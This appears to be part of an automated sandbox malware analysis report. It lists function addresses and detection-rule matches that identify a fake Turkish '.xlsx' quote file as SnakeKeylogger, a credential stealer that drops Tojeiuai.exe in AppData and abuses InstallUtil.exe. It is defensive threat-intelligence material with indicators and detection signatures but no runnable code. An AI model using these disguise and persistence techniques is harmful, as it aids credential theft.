                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A12FA93_2_05A12FA9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A12FB83_2_05A12FB8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A15F2A3_2_05A15F2A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1B7683_2_05A1B768
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A15F483_2_05A15F48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1B7583_2_05A1B758
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A146113_2_05A14611
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A100063_2_05A10006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B0C7103_2_05B0C710
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B089283_2_05B08928
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B054F13_2_05B054F1
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B000063_2_05B00006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B000403_2_05B00040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B093C93_2_05B093C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B0DD083_2_05B0DD08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B089183_2_05B08918
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B0CA373_2_05B0CA37
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1CF103_2_05B1CF10
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B173183_2_05B17318
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1C2283_2_05B1C228
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1CEFF3_2_05B1CEFF
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1E8A03_2_05B1E8A0
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1E8983_2_05B1E898
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1C2183_2_05B1C218
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B41D183_2_05B41D18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4CF683_2_05B4CF68
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B489883_2_05B48988
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B44BE83_2_05B44BE8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B41D083_2_05B41D08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B43C403_2_05B43C40
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4F9703_2_05B4F970
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B489783_2_05B48978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4F9613_2_05B4F961
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4D8F93_2_05B4D8F9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B44BD83_2_05B44BD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4DA323_2_05B4DA32
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05BE00063_2_05BE0006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05BE00403_2_05BE0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF08D83_2_05CF08D8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF08C93_2_05CF08C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF5BE93_2_05CF5BE9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF5BF83_2_05CF5BF8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E6E0483_2_05E6E048
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E500403_2_05E50040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E500233_2_05E50023
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E6D3D83_2_05E6D3D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5A0884_2_00B5A088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5C1464_2_00B5C146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5D2784_2_00B5D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B553624_2_00B55362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5C4684_2_00B5C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5C7384_2_00B5C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B569A04_2_00B569A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5E9884_2_00B5E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B539ED4_2_00B539ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5CA084_2_00B5CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5CCD84_2_00B5CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5CFA94_2_00B5CFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B56FC84_2_00B56FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5F6314_2_00B5F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B529EC4_2_00B529EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5E97A4_2_00B5E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5FA884_2_00B5FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B53E094_2_00B53E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B95484_2_054B9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B9C184_2_054B9C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B50284_2_054B5028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE2584_2_054BE258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD5404_2_054BD540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD5504_2_054BD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BDDFF4_2_054BDDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BDDF14_2_054BDDF1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BFC5F4_2_054BFC5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BFC684_2_054BFC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BCC8F4_2_054BCC8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BCCA04_2_054BCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEF514_2_054BEF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEF604_2_054BEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B178F4_2_054B178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B17A04_2_054B17A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B1E704_2_054B1E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BDE004_2_054BDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B1E804_2_054B1E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE6AF4_2_054BE6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE6A04_2_054BE6A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE6B04_2_054BE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B295B4_2_054B295B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B29684_2_054B2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD9994_2_054BD999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD9A84_2_054BD9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B00404_2_054B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF8034_2_054BF803
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B00064_2_054B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B50184_2_054B5018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF8104_2_054BF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD0F84_2_054BD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEB084_2_054BEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B93284_2_054B9328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B0B204_2_054B0B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B0B304_2_054B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B8B904_2_054B8B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF3A84_2_054BF3A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B8BA04_2_054B8BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF3B84_2_054BF3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE24B4_2_054BE24B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEAF84_2_054BEAF8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00ABC8F86_2_00ABC8F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB69786_2_00AB6978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB1BA86_2_00AB1BA8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB4E286_2_00AB4E28
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB69686_2_00AB6968
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB22C86_2_00AB22C8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00ABFA486_2_00ABFA48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB1C186_2_00AB1C18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB8DEC6_2_00AB8DEC
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB6DF76_2_00AB6DF7
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB85306_2_00AB8530
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB85406_2_00AB8540
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB6E086_2_00AB6E08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB4E186_2_00AB4E18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB8F606_2_00AB8F60
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FECCD86_2_04FECCD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE142C6_2_04FE142C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE46206_2_04FE4620
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FEC05B6_2_04FEC05B
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE00406_2_04FE0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FECCC96_2_04FECCC9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE46116_2_04FE4611
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE2FB86_2_04FE2FB8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE2FA96_2_04FE2FA9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FEB7686_2_04FEB768
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FEB7586_2_04FEB758
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE5F486_2_04FE5F48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE5F2A6_2_04FE5F2A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE001C6_2_04FE001C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051B00066_2_051B0006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051B00406_2_051B0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051EC7106_2_051EC710
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E89286_2_051E8928
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E54F16_2_051E54F1
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E00066_2_051E0006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E00406_2_051E0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E93C96_2_051E93C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051EDD086_2_051EDD08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E89186_2_051E8918
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051ECA376_2_051ECA37
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FCF106_2_051FCF10
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051F73186_2_051F7318
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FC2286_2_051FC228
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FCEFF6_2_051FCEFF
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FE8986_2_051FE898
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FE8A06_2_051FE8A0
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FC2186_2_051FC218
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05221D186_2_05221D18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0522CF686_2_0522CF68
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052289886_2_05228988
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05224BE86_2_05224BE8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05221D086_2_05221D08
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Binary or memory string: OriginalFilename vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061854644.0000000005950000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOmyawv.dll" vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2042179735.00000000014CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000000.2030872776.0000000000C52000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameTEKL0 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.0000000004478000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOmyawv.dll" vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Binary or memory string: OriginalFilenameTEKL0 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
